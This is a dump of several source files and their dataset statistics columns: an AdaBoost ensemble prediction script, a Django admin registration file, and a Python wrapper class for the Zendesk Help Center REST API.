'adaboost:learning_rate': '0.286357615604',
'adaboost:max_depth': '9.0',
'adaboost:n_estimators': '490.0',
'balancing:strategy': 'weighting',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'euclidean',
'feature_agglomeration:linkage': 'ward',
'feature_agglomeration:n_clusters': '220.0',
'imputation:strategy': 'median',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'min/max',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.377112372612',
'adaboost:max_depth': '10.0',
'adaboost:n_estimators': '458.0',
'balancing:strategy': 'weighting',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'euclidean',
'feature_agglomeration:linkage': 'ward',
'feature_agglomeration:n_clusters': '125.0',
'imputation:strategy': 'most_frequent',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'min/max',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.400954561452',
'adaboost:max_depth': '10.0',
'adaboost:n_estimators': '408.0',
'balancing:strategy': 'none',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'euclidean',
'feature_agglomeration:linkage': 'average',
'feature_agglomeration:n_clusters': '345.0',
'imputation:strategy': 'median',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'min/max',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.196044249482',
'adaboost:max_depth': '9.0',
'adaboost:n_estimators': '494.0',
'balancing:strategy': 'none',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'manhattan',
'feature_agglomeration:linkage': 'average',
'feature_agglomeration:n_clusters': '182.0',
'imputation:strategy': 'median',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'min/max',
},
{
'adaboost:algorithm': 'SAMME.R',
'adaboost:learning_rate': '0.312315129765',
'adaboost:max_depth': '10.0',
'adaboost:n_estimators': '442.0',
'balancing:strategy': 'weighting',
'classifier': 'adaboost',
'feature_agglomeration:affinity': 'manhattan',
'feature_agglomeration:linkage': 'complete',
'feature_agglomeration:n_clusters': '347.0',
'imputation:strategy': 'median',
'preprocessor': 'feature_agglomeration',
'rescaling:strategy': 'none'}
]
classifiers = []
predictions_valid = []
predictions_test = []
# Make predictions and weight them
for weight, configuration in zip(weights, configurations):
for param in configuration:
try:
configuration[param] = int(configuration[param])
except Exception:
try:
configuration[param] = float(configuration[param])
except Exception:
pass
classifier = ParamSklearnClassifier(configuration, 1)
classifiers.append(classifier)
try:
classifier.fit(X.copy(), y.copy())
predictions_valid.append(
classifier.predict_proba(X_valid.copy()) * weight)
predictions_test.append(
classifier.predict_proba(X_test.copy()) * weight)
except Exception as e:
print e
print configuration
# Output the predictions
for name, predictions in [('valid', predictions_valid),
('test', predictions_test)]:
predictions = np.array(predictions)
predictions = np.sum(predictions, axis=0)
predictions = predictions[:, 1].reshape((-1, 1))
filepath = os.path.join(output, '%s_%s_000.predict' % (dataset, name))
np.savetxt(filepath, predictions, delimiter=' ')
| 38.297872
| 77
| 0.611313
| 1,830
| 19,800
| 6.455191
| 0.125683
| 0.209938
| 0.057733
| 0.060357
| 0.832303
| 0.827394
| 0.827394
| 0.827394
| 0.748413
| 0.744519
| 0
| 0.063178
| 0.231768
| 19,800
| 517
| 78
| 38.297872
| 0.713431
| 0.017475
| 0
| 0.614141
| 0
| 0
| 0.558492
| 0.247082
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.00202
| 0.016162
| null | null | 0.00404
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6d5672c1f3d89f64d3d0b176f65a248b465de2cd
| 148
|
py
|
Python
|
APICore/admin.py
|
YWPS/API-Production
|
a4a40c45db4839c6ee0b92b169aeab8849a7ff16
|
[
"MIT"
] | null | null | null |
APICore/admin.py
|
YWPS/API-Production
|
a4a40c45db4839c6ee0b92b169aeab8849a7ff16
|
[
"MIT"
] | null | null | null |
APICore/admin.py
|
YWPS/API-Production
|
a4a40c45db4839c6ee0b92b169aeab8849a7ff16
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import Image, Product, Item
# Register your models here.
admin.site.register([Image, Product, Item])
| 24.666667
| 43
| 0.777027
| 21
| 148
| 5.47619
| 0.619048
| 0.208696
| 0.278261
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.128378
| 148
| 5
| 44
| 29.6
| 0.891473
| 0.175676
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
edd6854268e87066291a8ac59176b0a3129f4939
| 37,450
|
py
|
Python
|
jupyterbook_to_zendesk/zendeskhc/HelpCenter.py
|
dabble-of-devops-bioanalyze/jupyterbook_to_zendesk
|
69cc4707626097a65612823de9282e9728e714d8
|
[
"Apache-2.0"
] | null | null | null |
jupyterbook_to_zendesk/zendeskhc/HelpCenter.py
|
dabble-of-devops-bioanalyze/jupyterbook_to_zendesk
|
69cc4707626097a65612823de9282e9728e714d8
|
[
"Apache-2.0"
] | null | null | null |
jupyterbook_to_zendesk/zendeskhc/HelpCenter.py
|
dabble-of-devops-bioanalyze/jupyterbook_to_zendesk
|
69cc4707626097a65612823de9282e9728e714d8
|
[
"Apache-2.0"
] | null | null | null |
import json
import os
import sys
from pprint import pprint
import requests
from prettyprinter import cpprint
from jupyterbook_to_zendesk.logging import logger
from jupyterbook_to_zendesk.zendeskhc.ZendeskBase import *
class HelpCenter(Base):
def __init__(self, domain, email=None, password=None):
self.domain = domain
self.email = email
self.password = password
def _page_gets(self, url, combine_key):
data = self.get(url, self.email, self.password)
if "error" in data.keys():
raise ZendeskError(data["error"])
next_page_url = data["next_page"]
while next_page_url is not None:
next_page_json = self.get(next_page_url, self.email, self.password)
data[combine_key] = data[combine_key] + next_page_json[combine_key]
next_page_url = next_page_json["next_page"]
data["next_page"] = None
return data
def _generate_options(self, options=None):
option_string = "?"
if not options:
options = {}
if "per_page" not in options.keys():
options["per_page"] = 100
for i in options.keys():
option_string = option_string + i
option_string = option_string + "="
option_string = option_string + str(options[i])
option_string = option_string + "&"
return option_string
# Article functions
def list_all_articles(self, options=None):
option_string = self._generate_options(options)
url = self.domain + "/api/v2/help_center/articles.json" + option_string
return self._page_gets(url, "articles")
def list_articles_by_locale(self, locale, options=None):
option_string = self._generate_options(options)
url = self.domain + "/api/v2/help_center/{locale}/articles.json" + option_string
url = url.format(locale=locale)
return self._page_gets(url, "articles")
def list_articles_by_category(self, category_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/categories/{id}/articles.json"
+ option_string
)
url = url.format(id=category_id)
return self._page_gets(url, "articles")
def list_articles_by_section(self, section_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/sections/{id}/articles.json"
+ option_string
)
url = url.format(id=section_id)
return self._page_gets(url, "articles")
def list_articles_by_user(self, user_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain + "/api/v2/help_center/users/{id}/articles.json" + option_string
)
url = url.format(id=user_id)
return self._page_gets(url, "articles")
def list_changed_articles(self, start_time, options=None):
# start_time should be a Unix epoch time
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/incremental/articles.json?start_time={start_time}"
+ option_string
)
url = url.format(start_time=start_time)
return self._page_gets(url, "articles")
def show_article(self, article_id, locale=None):
if not locale:
url = self.domain + "/api/v2/help_center/articles/{id}.json".format(
id=article_id
)
else:
url = (
self.domain
+ "/api/v2/help_center/{locale}/articles/{id}.json".format(
id=article_id, locale=locale
)
)
return self.get(url, self.email, self.password)
def create_article(self, section_id, data, locale=None):
if not locale:
url = self.domain + f"/api/v2/help_center/sections/{section_id}/articles"
else:
url = (
self.domain
+ f"/api/v2/help_center/{locale}/sections/{section_id}/articles"
)
return self.post(url, data, self.email, self.password)
def update_article_metadata(self, article_id, data, locale=None):
if not locale:
url = self.domain + "/api/v2/help_center/articles/{id}.json".format(
id=article_id
)
else:
url = (
self.domain
+ "/api/v2/help_center/{locale}/articles/{id}.json".format(
id=article_id, locale=locale
)
)
return self.put(url, data, self.email, self.password)
def archive_article(self, article_id, locale=None):
if not locale:
url = self.domain + "/api/v2/help_center/articles/{id}.json".format(
id=article_id
)
else:
url = (
self.domain
+ "/api/v2/help_center/{locale}/articles/{id}.json".format(
id=article_id, locale=locale
)
)
return self.delete(url, self.email, self.password)
# Translation functions
def list_article_translations(self, article_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/translations.json"
+ option_string
)
url = url.format(article_id=article_id)
return self._page_gets(url, "translations")
def list_section_translations(self, section_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/sections/{section_id}/translations.json"
+ option_string
)
url = url.format(section_id=section_id)
return self._page_gets(url, "translations")
def list_category_translations(self, category_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/categories/{category_id}/translations.json"
+ option_string
)
url = url.format(category_id=category_id)
return self._page_gets(url, "translations")
def list_missing_article_translations(self, article_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/translations/missing.json"
+ option_string
)
url = url.format(article_id=article_id)
return self.get(url, self.email, self.password)
def list_missing_section_translations(self, section_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/sections/{section_id}/translations/missing.json"
+ option_string
)
url = url.format(section_id=section_id)
return self.get(url, self.email, self.password)
def list_missing_category_translations(self, category_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/categories/{category_id}/translations/missing.json"
+ option_string
)
url = url.format(category_id=category_id)
return self.get(url, self.email, self.password)
def show_translation(self, article_id, locale):
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/translations/{locale}.json".format(
article_id=article_id, locale=locale
)
)
return self.get(url, self.email, self.password)
def create_article_translation(self, article_id, data):
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/translations.json".format(
article_id=article_id
)
)
return self.post(url, data, self.email, self.password)
def create_section_translation(self, section_id, data):
url = (
self.domain
+ "/api/v2/help_center/section/{section_id}/translations.json".format(
section_id=section_id
)
)
return self.post(url, data, self.email, self.password)
def create_category_translation(self, category_id, data):
url = (
self.domain
+ "/api/v2/help_center/categories/{category_id}/translations.json".format(
category_id=category_id
)
)
return self.post(url, data, self.email, self.password)
def update_article_translation(self, article_id, data, locale):
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/translations/{locale}.json".format(
article_id=article_id, locale=locale
)
)
return self.put(url, data, self.email, self.password)
def update_section_translation(self, section_id, data, locale):
url = (
self.domain
+ "/api/v2/help_center/section/{section_id}/translations/{locale}.json".format(
section_id=section_id
)
)
return self.put(url, data, self.email, self.password)
def update_category_translation(self, category_id, data, locale):
url = (
self.domain
+ "/api/v2/help_center/categories/{category_id}/translations/{locale}.json".format(
category_id=category_id
)
)
return self.put(url, data, self.email, self.password)
def delete_translation(self, translation_id):
url = self.domain + "/api/v2/help_center/translations/{id}.json".format(
id=translation_id
)
return self.delete(url, self.email, self.password)
def list_enabled_and_default_locales(self):
url = self.domain + "/api/v2/help_center/locales.json"
return self.get(url, self.email, self.password)
# Section functions
def list_all_sections(self, options=None):
option_string = self._generate_options(options)
url = self.domain + "/api/v2/help_center/sections.json" + option_string
return self._page_gets(url, "sections")
def list_sections_by_locale(self, locale, options=None):
option_string = self._generate_options(options)
url = self.domain + "/api/v2/help_center/{locale}/sections.json" + option_string
url = url.format(locale=locale)
return self._page_gets(url, "sections")
def list_sections_by_category(self, category_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/categories/{category_id}/sections.json"
+ option_string
)
url = url.format(category_id=category_id)
return self._page_gets(url, "sections")
def show_section(self, section_id, locale=None):
if not locale:
url = self.domain + "/api/v2/help_center/sections/{id}.json".format(
id=section_id
)
else:
url = (
self.domain
+ "/api/v2/help_center/{locale}/sections/{id}.json".format(
locale=locale, id=section_id
)
)
return self.get(url, self.email, self.password)
def create_section(self, category_id, data, locale=None):
if not locale:
url = (
self.domain
+ "/api/v2/help_center/categories/{id}/sections.json".format(
id=category_id
)
)
else:
url = (
self.domain
+ "/api/v2/help_center/{locale}/categories/{id}/sections".format(
locale=locale, id=category_id
)
)
return self.post(url, data, self.email, self.password)
def update_section(self, section_id, data, locale=None):
if not locale:
url = self.domain + "/api/v2/help_center/sections/{id}.json".format(
id=section_id
)
else:
url = (
self.domain
+ "/api/v2/help_center/{locale}/sections/{id}.json".format(
locale=locale, id=section_id
)
)
return self.put(url, data, self.email, self.password)
def update_section_source_locale(self, section_id, data):
url = (
self.domain
+ "/api/v2/help_center/sections/{id}/source_locale.json".format(
id=section_id
)
)
return self.put(url, data, self.email, self.password)
def delete_section(self, section_id):
url = self.domain + "/api/v2/help_center/sections/{id}.json".format(
id=section_id
)
return self.delete(url, self.email, self.password)
# Category functions
def list_all_categories(self, options=None):
option_string = self._generate_options(options)
url = self.domain + "/api/v2/help_center/categories.json" + option_string
return self._page_gets(url, "categories")
def list_categories_by_locale(self, locale, options=None):
option_string = self._generate_options(options)
url = (
self.domain + "/api/v2/help_center/{locale}/categories.json" + option_string
)
url = url.format(locale=locale)
return self._page_gets(url, "categories")
def show_category(self, category_id, locale=None):
if not locale:
url = self.domain + "/api/v2/help_center/categories/{id}.json".format(
id=category_id
)
else:
url = (
self.domain
+ "/api/v2/help_center/{locale}/categories/{id}.json".format(
locale=locale, id=category_id
)
)
return self.get(url, self.email, self.password)
def create_category(self, data, locale=None):
if not locale:
url = self.domain + "/api/v2/help_center/categories.json"
else:
url = self.domain + "/api/v2/help_center/{locale}/categories.json".format(
locale=locale
)
return self.post(url, data, self.email, self.password)
def update_category(self, category_id, data, locale=None):
if not locale:
url = self.domain + "/api/v2/help_center/categories/{id}.json".format(
id=category_id
)
else:
url = (
self.domain
+ "/api/v2/help_center/{locale}/categories/{id}.json".format(
locale=locale, id=category_id
)
)
return self.put(url, data, self.email, self.password)
def update_category_source_locale(self, category_id, data):
url = (
self.domain
+ "/api/v2/help_center/categories/{id}/source_locale.json".format(
id=category_id
)
)
return self.put(url, data, self.email, self.password)
def delete_category(self, category_id):
url = self.domain + "/api/v2/help_center/categories/{id}.json".format(
id=category_id
)
return self.delete(url, self.email, self.password)
# Comment Functions
def list_comments_by_user(self, user_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain + "/api/v2/help_center/users/{id}/comments.json" + option_string
)
url = url.format(id=user_id)
return self._page_gets(url, "comments")
def list_comments_by_article(self, article_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/articles/{id}/comments.json"
+ option_string
)
url = url.format(id=article_id)
return self._page_gets(url, "comments")
def show_comment(self, article_id, user_id):
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/comments/{id}.json".format(
article_id=article_id, id=user_id
)
)
return self.get(url, self.email, self.password)
def create_comment(self, article_id, data):
url = self.domain + "/api/v2/help_center/articles/{id}/comments.json".format(
id=article_id
)
return self.post(url, data, self.email, self.password)
def update_comment(self, article_id, comment_id, data):
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/comments/{id}.json".format(
article_id=article_id, id=comment_id
)
)
return self.put(url, data, self.email, self.password)
def delete_comment(self, article_id, comment_id):
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/comments/{id}.json".format(
article_id=article_id, id=comment_id
)
)
return self.delete(url, self.email, self.password)
# Labels Functions
def list_all_labels(self, options=None):
option_string = self._generate_options(options)
url = self.domain + "/api/v2/help_center/articles/labels.json" + option_string
return self._page_gets(url, "labels")
def list_labels_by_article(self, article_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/articles/{id}/labels.json"
+ option_string
)
url = url.format(id=article_id)
return self._page_gets(url, "labels")
def show_label(self, label_id):
url = self.domain + "/api/v2/help_center/articles/labels/{id}.json".format(
id=label_id
)
return self.get(url, self.email, self.password)
def create_label(self, article_id, data):
url = self.domain + "/api/v2/help_center/articles/{id}/labels.json".format(
id=article_id
)
return self.post(url, data, self.email, self.password)
def delete_label(self, article_id, label_id):
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/labels/{id}.json".format(
article_id=article_id, id=label_id
)
)
return self.delete(url, self.email, self.password)
# Article Attachments
def list_article_attachments(self, article_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/attachments.json"
+ option_string
)
url = url.format(article_id=article_id)
return self._page_gets(url, "article_attachments")
def list_article_inline_attachments(self, article_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/attachments/inline.json"
+ option_string
)
url = url.format(article_id=article_id)
return self._page_gets(url, "article_attachments")
def list_article_block_attachments(self, article_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/attachments/block.json"
+ option_string
)
url = url.format(article_id=article_id)
return self._page_gets(url, "article_attachments")
def show_article_attachment(self, attachment_id):
url = self.domain + "/api/v2/help_center/articles/attachments/{id}.json".format(
id=attachment_id
)
return self.get(url, self.email, self.password)
def create_article_attachment(self, article_id, data):
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/attachments.json".format(
article_id=article_id
)
)
return self.post(url, data, self.email, self.password)
def create_unassociated_attachment(self, data):
url = self.domain + "/api/v2/help_center/articles/attachments.json"
return self.post(url, data, self.email, self.password)
def delete_article_attachment(self, attachment_id, data):
url = self.domain + "/api/v2/help_center/articles/attachments/{id}.json".format(
id=attachment_id
)
return self.delete(url, self.email, self.password)
# Topic functions
def list_all_topics(self, options=None):
option_string = self._generate_options(options)
url = self.domain + "/api/v2/community/topics.json" + option_string
return self._page_gets(url, "topics")
def show_topic(self, topic_id):
url = self.domain + "/api/v2/community/topics/{id}.json".format(id=topic_id)
return self.get(url, self.email, self.password)
def create_topic(self, data):
url = self.domain + "/api/v2/community/topics.json"
return self.post(url, data, self.email, self.password)
def update_topic(self, topic_id, data):
url = self.domain + "/api/v2/community/topics/{id}.json".format(id=topic_id)
return self.put(url, data, self.email, self.password)
def delete_topic(self, topic_id):
url = self.domain + "/api/v2/community/topics/{id}.json".format(id=topic_id)
return self.delete(url, self.email, self.password)
# Post functions
def list_all_posts(self, options=None):
option_string = self._generate_options(options)
url = self.domain + "/api/v2/community/posts.json" + option_string
return self._page_gets(url, "posts")
def list_posts_by_topic(self, topic_id, options=None):
option_string = self._generate_options(options)
url = self.domain + "/api/v2/community/topics/{id}/posts.json" + option_string
url = url.format(id=topic_id)
return self._page_gets(url, "posts")
def list_posts_by_user(self, user_id, options=None):
option_string = self._generate_options(options)
url = self.domain + "/api/v2/community/users/{id}/posts.json" + option_string
url = url.format(id=user_id)
return self._page_gets(url, "posts")
def show_post(self, post_id):
url = self.domain + "/api/v2/community/posts/{id}.json".format(id=post_id)
return self.get(url, self.email, self.password)
def create_post(self, data):
url = self.domain + "/api/v2/community/posts.json"
return self.post(url, data, self.email, self.password)
def update_post(self, post_id, data):
url = self.domain = "/api/v2/community/posts/{id}.json".format(id=post_id)
return self.put(url, data, self.email, self.password)
def delete_post(self, post_id):
url = self.domain = "/api/v2/community/posts/{id}.json".format(id=post_id)
return self.delete(url, self.email, self.password)
# Post comment functions
def list_post_comments(self, post_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/community/posts/{post_id}/comments.json"
+ option_string
)
url = url.format(post_id=post_id)
return self._page_gets(url, "comments")
def list_post_comments_by_user(self, user_id, options=None):
option_string = self._generate_options(options)
url = self.domain + "/api/v2/community/users/{id}/comments.json" + option_string
url = url.format(id=user_id)
return self._page_gets(url, "comments")
def show_post_comment(self, post_id, comment_id):
url = (
self.domain
+ "/api/v2/community/posts/{post_id}/comments/{id}.json".format(
post_id=post_id, id=comment_id
)
)
return self.get(url, self.email, self.password)
def create_post_comment(self, post_id, data):
url = self.domain + "/api/v2/community/posts/{post_id}/comments.json".format(
post_id=post_id
)
return self.post(url, data, self.email, self.password)
def update_post_comment(self, post_id, comment_id, data):
url = (
self.domain
+ "/api/v2/community/posts/{post_id}/comments/{id}.json".format(
post_id=post_id, id=comment_id
)
)
return self.put(url, data, self.email, self.password)
def delete_post_comment(self, post_id, comment_id):
url = (
self.domain
+ "/api/v2/community/posts/{post_id}/comments/{id}.json".format(
post_id=post_id, id=comment_id
)
)
return self.delete(url, self.email, self.password)
# Article Subscription functions
def list_article_subscriptions(self, article_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/subscriptions.json"
+ option_string
)
url = url.format(article_id=article_id)
return self._page_gets(url, "subscriptions")
def show_article_subscription(self, article_id, subscription_id):
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/subscriptions/{id}.json".format(
article_id=article_id, id=subscription_id
)
)
return self.get(url, self.email, self.password)
def create_article_subscription(self, article_id, data):
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/subscriptions.json".format(
article_id=article_id
)
)
return self.post(url, data, self.email, self.password)
def delete_article_subscription(self, article_id, subscription_id):
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/subscriptions/{id}.json".format(
article_id=article_id, id=subscription_id
)
)
return self.delete(url, self.email, self.password)
# Section Subscription functions
def list_section_subscriptions(self, section_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/sections/{section_id}/subscriptions.json"
+ option_string
)
url = url.format(section_id=section_id)
return self._page_gets(url, "subscriptions")
def show_section_subscription(self, section_id, subscription_id):
url = (
self.domain
+ "/api/v2/help_center/sections/{section_id}/subscriptions/{id}.json".format(
section_id=section_id, id=subscription_id
)
)
return self.get(url, self.email, self.password)
def create_section_subscription(self, section_id, data):
url = (
self.domain
+ "/api/v2/help_center/sections/{section_id}/subscriptions.json".format(
section_id=section_id
)
)
return self.post(url, data, self.email, self.password)
def delete_section_subscription(self, section_id, subscription_id):
url = (
self.domain
+ "/api/v2/help_center/sections/{section_id}/subscriptions/{id}.json".format(
section_id=section_id, id=subscription_id
)
)
return self.delete(url, self.email, self.password)
# User Subscription functions
def list_user_subscriptions(self, user_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/users/{user_id}/subscriptions.json"
+ option_string
)
url = url.format(user_id=user_id)
return self._page_gets(url, "subscriptions")
# Post Subscription functions
def list_post_subscriptions(self, post_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/posts/{post_id}/subscriptions.json"
+ option_string
)
url = url.format(post_id=post_id)
return self._page_gets(url, "subscriptions")
def show_post_subscription(self, post_id, subscription_id):
url = (
self.domain
+ "/api/v2/help_center/posts/{post_id}/subscriptions/{id}.json".format(
post_id=post_id, id=subscription_id
)
)
return self.get(url, self.email, self.password)
def create_post_subscription(self, post_id, data):
url = (
self.domain
+ "/api/v2/help_center/posts/{post_id}/subscriptions.json".format(
post_id=post_id
)
)
return self.post(url, data, self.email, self.password)
def delete_post_subscription(self, post_id, subscription_id):
url = (
self.domain
+ "/api/v2/help_center/posts/{post_id}/subscriptions/{id}.json".format(
post_id=post_id, id=subscription_id
)
)
return self.delete(url, self.email, self.password)
# Topic Subscription functions
def list_topic_subscriptions(self, topic_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/community/topics/{topic_id}/subscriptions.json"
+ option_string
)
url = url.format(topic_id=topic_id)
return self._page_gets(url, "subscriptions")
def show_topic_subscription(self, topic_id, subscription_id):
url = (
self.domain
+ "/api/v2/community/topics/{topic_id}/subscriptions/{id}.json".format(
topic_id=topic_id, id=subscription_id
)
)
return self.get(url, self.email, self.password)
def create_topic_subscription(self, topic_id, data):
url = (
self.domain
+ "/api/v2/community/topics/{topic_id}/subscriptions.json".format(
topic_id=topic_id
)
)
return self.post(url, data, self.email, self.password)
def delete_topic_subscription(self, topic_id, subscription_id):
url = (
self.domain
+ "/api/v2/community/topics/{topic_id}/subscriptions/{id}.json".format(
topic_id=topic_id, id=subscription_id
)
)
return self.delete(url, self.email, self.password)
# Vote functions
def list_user_votes(self, user_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/users/{user_id}/votes.json"
+ option_string
)
url = url.format(user_id=user_id)
return self._page_gets(url, "votes")
def list_article_votes(self, article_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/votes.json"
+ option_string
)
url = url.format(article_id=article_id)
return self._page_gets(url, "votes")
def list_article_comment_votes(self, article_id, comment_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/comments/{comment_id}/votes.json"
+ option_string
)
url = url.format(article_id=article_id, comment_id=comment_id)
return self._page_gets(url, "votes")
def list_post_votes(self, post_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/posts/{post_id}/votes.json"
+ option_string
)
url = url.format(post_id=post_id)
return self._page_gets(url, "votes")
def list_post_comment_votes(self, post_id, comment_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/posts/{post_id}/comments/{comment_id}/votes.json"
+ option_string
)
url = url.format(post_id=post_id, comment_id=comment_id)
return self._page_gets(url, "votes")
def show_vote(self, vote_id):
url = self.domain + "/api/v2/help_center/votes/{id}.json".format(id=vote_id)
return self.get(url, self.email, self.password)
def vote_article_up(self, article_id):
url = self.domain + "/api/v2/help_center/articles/{id}/up.json".format(
id=article_id
)
return self.post(url, self.email, self.password)
def vote_article_down(self, article_id):
url = self.domain + "/api/v2/help_center/articles/{id}/down.json".format(
id=article_id
)
return self.post(url, self.email, self.password)
def vote_article_comment_up(self, article_id, comment_id):
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/comments/{id}/up.json".format(
article_id=article_id, id=comment_id
)
)
return self.post(url, self.email, self.password)
def vote_article_comment_down(self, article_id, comment_id):
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/comments/{id}/down.json".format(
article_id=article_id, id=comment_id
)
)
return self.post(url, self.email, self.password)
def vote_post_up(self, post_id):
url = self.domain + "/api/v2/help_center/posts/{id}/up.json".format(id=post_id)
return self.post(url, self.email, self.password)
def vote_post_down(self, post_id):
url = self.domain + "/api/v2/help_center/posts/{id}/down.json".format(
id=post_id
)
return self.post(url, self.email, self.password)
def vote_post_comment_up(self, post_id, comment_id):
url = (
self.domain
+ "/api/v2/help_center/posts/{post_id}/comments/{id}/up.json".format(
post_id=post_id, id=comment_id
)
)
return self.post(url, self.email, self.password)
def vote_post_comment_down(self, post_id, comment_id):
url = (
self.domain
+ "/api/v2/help_center/posts/{post_id}/comments/{id}/down.json".format(
post_id=post_id, id=comment_id
)
)
return self.post(url, self.email, self.password)
def delete_vote(self, vote_id):
url = self.domain + "/api/v2/help_center/votes/{id}.json".format(id=vote_id)
return self.delete(url, self.email, self.password)
# Access policy functions
def show_section_access_policy(self, section_id):
url = (
self.domain
+ "/api/v2/help_center/sections/{section_id}/access_policy.json".format(
section_id=section_id
)
)
return self.get(url, self.email, self.password)
def show_topic_access_policy(self, topic_id):
url = (
self.domain
+ "/api/v2/community/topics/{topic_id}/access_policy.json".format(
topic_id=topic_id
)
)
return self.get(url, self.email, self.password)
def update_section_access_policy(self, section_id, data):
url = (
self.domain
+ "/api/v2/help_center/sections/{section_id}/access_policy.json".format(
section_id=section_id
)
)
return self.put(url, data, self.email, self.password)
def update_topic_access_policy(self, topic_id, data):
url = (
self.domain
+ "/api/v2/community/topics/{topic_id}/access_policy.json".format(
topic_id=topic_id
)
)
return self.put(url, data, self.email, self.password)
# Article Search functions
def search_articles_by_labels(self, labels):
labels_string = ""
for i in labels:
labels_string = labels_string + i + ","
url = (
self.domain
+ "/api/v2/help_center/articles.json?label_names="
+ labels_string
)
return self._page_gets(url, "labels")
# User Information
def get_me(self):
url = self.domain + "/api/v2/users/me.json"
return self.get(url, self.email, self.password)
| 35.803059
| 95
| 0.599439
| 4,468
| 37,450
| 4.801925
| 0.027753
| 0.055791
| 0.075134
| 0.090981
| 0.90282
| 0.887392
| 0.872058
| 0.857889
| 0.833232
| 0.798369
| 0
| 0.004762
| 0.287797
| 37,450
| 1,045
| 96
| 35.837321
| 0.79964
| 0.012069
| 0
| 0.552752
| 0
| 0
| 0.177867
| 0.166969
| 0
| 0
| 0
| 0
| 0
| 1
| 0.134174
| false
| 0.091743
| 0.009174
| 0
| 0.277523
| 0.002294
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
edf0effdc5b15a84ca9b42dea9cee4ec9d0933a4
| 22,925
|
py
|
Python
|
dianascript/code_cons.py
|
thautwarm/DianaVM
|
be13363e4137c919df15601366d91ab69361dd18
|
